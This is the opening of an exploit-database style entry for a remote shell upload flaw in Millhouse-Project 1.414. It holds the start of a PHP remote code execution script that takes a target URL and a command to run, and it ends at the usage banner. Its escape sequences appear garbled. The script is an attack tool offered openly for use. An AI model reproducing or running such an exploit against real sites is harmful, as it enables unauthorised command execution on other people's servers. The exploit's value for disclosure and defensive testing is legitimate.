Millhouse-Project version 1.414 suffers from a remote shell upload vulnerability.
<?php
/*
Exploit Title: thrsrossi Millhouse-Project 1.414 Remote Code Execution
Date: 12/05/2023
Exploit Author: Chokri Hammedi
Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
Software Link: https://github.com/thrsrossi/Millhouse-Project.git
Version: 1.414
Tested on: Debian
CVE: N/A
*/
$options = getopt('u:c:');
if(!isset($options['u'], $options['c']))
die(" 33[1;32m n Millhouse Remote Code Execution n Author: Chokri Hammedi
n n Usage : php exploit.php -u http://target.org/ -c whoaminn